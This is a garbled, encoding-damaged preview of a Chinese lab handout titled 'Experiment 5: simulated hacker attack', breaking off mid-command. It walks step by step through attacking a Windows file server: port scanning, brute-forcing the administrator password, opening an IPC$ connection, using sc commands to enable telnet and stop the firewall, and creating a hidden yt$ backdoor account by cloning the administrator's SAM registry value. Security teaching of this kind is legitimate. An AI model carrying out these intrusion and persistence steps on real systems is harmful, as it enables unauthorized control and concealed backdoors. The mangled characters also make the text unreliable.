資源描述:
《實(shí)驗(yàn)五-模擬黑客攻擊》由會(huì)員上傳分享���,免費(fèi)在線閱讀���,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫。
1��、word資料下載可編輯實(shí)驗(yàn)五模擬黑客攻擊實(shí)驗(yàn)環(huán)境:本例以攻擊一臺(tái)文件服務(wù)器為例����,演示通常的攻擊方法和思路。該文件服務(wù)器默認(rèn)安裝了windows?。螅澹颍觯澹颉。玻埃埃?�,啟動(dòng)了windows防火墻但是允許文件共享���。其余設(shè)置全為默認(rèn)安裝設(shè)置,并安裝了所有補(bǔ)丁�����。專業(yè)技術(shù)資料word資料下載可編輯需求描述:?掃描目標(biāo)計(jì)算機(jī)?獲得管理員權(quán)限?安裝后門?清除攻擊記錄實(shí)驗(yàn)步驟:一、掃描目標(biāo)計(jì)算機(jī)a)在B計(jì)算機(jī)上使用掃描軟件掃描目標(biāo)計(jì)算機(jī)A����,確定開放的端口,判斷操作系統(tǒng)的類型��。b)掃描軟件推薦使用X-scan或流光��。X-SCAN:專業(yè)技術(shù)資料word資料下載可編輯專業(yè)技術(shù)資料wor
2���、d資料下載可編輯使用流光:打開流光主界面---右擊IPC主機(jī)---編輯---添加目標(biāo)主機(jī)主機(jī)添加完后����,生成字典---工具---字典工具---黑客字典III生成字典專業(yè)技術(shù)資料word資料下載可編輯右擊目標(biāo)添加的主機(jī)---探測(cè)---探測(cè)所有IPC$遠(yuǎn)程登錄專業(yè)技術(shù)資料word資料下載可編輯配置字典探測(cè)報(bào)告一��、獲得管理員權(quán)限a)根據(jù)掃描結(jié)果�����,嘗試暴力破解管理員賬戶的密碼�。b)X-scan、流光����、LC5等軟件都提供了暴力破解功能���。破解成功后會(huì)自動(dòng)生成報(bào)告。二��、入侵目標(biāo)計(jì)算機(jī)a)使用管理員的賬戶建立IPC鏈接���,命令為"netuse\1.1.1.1ipc$123456/u
3��、ser:administrator"�����。專業(yè)技術(shù)資料word資料下載可編輯a)使用SC命令獲取目標(biāo)計(jì)算機(jī)的所有服務(wù)列表�����,并保存在本地��,命令為“sc\1.1.1.1querytype=servicestate=all>c:1.txt”b)打開1.txt文件���,找到telnet,確認(rèn)telnet服務(wù)的狀態(tài)�����。c)去除telnet服務(wù)的禁用狀態(tài)�,設(shè)置為自動(dòng)運(yùn)行,命令為“sc\1.1.1.1configtlntsvrstart=auto”���。然后啟用telnet服務(wù)�����,命令為“sc\1.1.1.1starttlntsvr”。專業(yè)技術(shù)資料word資料下載可編輯a)停用目標(biāo)計(jì)算機(jī)
4���、的windows防火�����,命令為“sc\1.1.1.1stopsharedaccess”b)確認(rèn)目標(biāo)計(jì)算機(jī)啟用了遠(yuǎn)程注冊(cè)表服務(wù)��,命令為“sc\1.1.1.1qcremoteregistry”�����,如果服務(wù)為停止?fàn)顟B(tài)��,則將其啟動(dòng)����。二、添加隱藏賬戶a)建立telnet連接�,管理目標(biāo)計(jì)算機(jī),命令為“telnet1.1.1.1”����,連接成功后輸入管理員的賬戶名和密碼專業(yè)技術(shù)資料word資料下載可編輯a)通過telnet����,在目標(biāo)計(jì)算機(jī)上建立隱藏賬戶����,命令為“netuseryt$111/add”�����,其中“$”符號(hào)用于在命令行里隱藏賬戶����,但是在圖形化管理工具里該賬戶還是可見的��。專業(yè)技術(shù)資
5����、料word資料下載可編輯a)在本地運(yùn)行“regedt32”���,在“注冊(cè)表編輯器”中選擇“文件”——“連接網(wǎng)絡(luò)注冊(cè)表”。專業(yè)技術(shù)資料word資料下載可編輯a)打開目標(biāo)計(jì)算機(jī)的注冊(cè)表���,右擊“hkey_local_machine”項(xiàng)下“sam”子項(xiàng)下的“sam”子項(xiàng)�����,選擇權(quán)限b)在SAM的權(quán)限窗口中����,賦予管理員完全控制權(quán)限��。斷開與目標(biāo)計(jì)算機(jī)注冊(cè)表的連接�����,然后重新建立連接��。專業(yè)技術(shù)資料word資料下載可編輯a)展開目標(biāo)計(jì)算機(jī)的“hkey_local_machinesamsamdomainsaccountusersames”項(xiàng),找到“administrator”和
6�����、新建的賬戶yt$���,記錄他們的類型,本例中“administrator”的類型為“0x1f4”����,“yt$”的類型為“0x3eb”專業(yè)技術(shù)資料word資料下載可編輯a)展開目標(biāo)計(jì)算機(jī)“hkey_local_machinesamsamdomainsaccountusersames”項(xiàng)下后三位是“1f4”的子項(xiàng),該項(xiàng)和administrator項(xiàng)對(duì)應(yīng)���。專業(yè)技術(shù)資料word資料下載可編輯a)雙擊右側(cè)窗格1f4項(xiàng)下的F鍵值�,復(fù)制F鍵值下的全部數(shù)據(jù)��。專業(yè)技術(shù)資料word資料下載可編輯a)展開目標(biāo)計(jì)算機(jī)“hkey_local_machinesamsamdomai
7���、nsaccountusersames”項(xiàng)下后三位是“3eb”的子項(xiàng)��,使用從1f4項(xiàng)復(fù)制的數(shù)據(jù)覆蓋“”項(xiàng)下F鍵值的數(shù)據(jù)���。專業(yè)技術(shù)資料word資料下載可編輯a)導(dǎo)出目標(biāo)計(jì)算機(jī)注冊(cè)表的yt$項(xiàng)和000003eb項(xiàng)保存到本地���,分別命名為yt.reg和*reg,然后將yt.reg和3eb.reg拷貝到\1.1.1.1c$下專業(yè)技術(shù)資料word資料下載可編輯專業(yè)技術(shù)資料word資料下載可編輯專業(yè)技術(shù)資料word資料下載可編輯專業(yè)技術(shù)資料word資料下載可編輯專業(yè)技術(shù)資料word資料下載可編輯a)返回到telnet命令行�,刪除目標(biāo)計(jì)算機(jī)的賬戶yt$,命令為“net
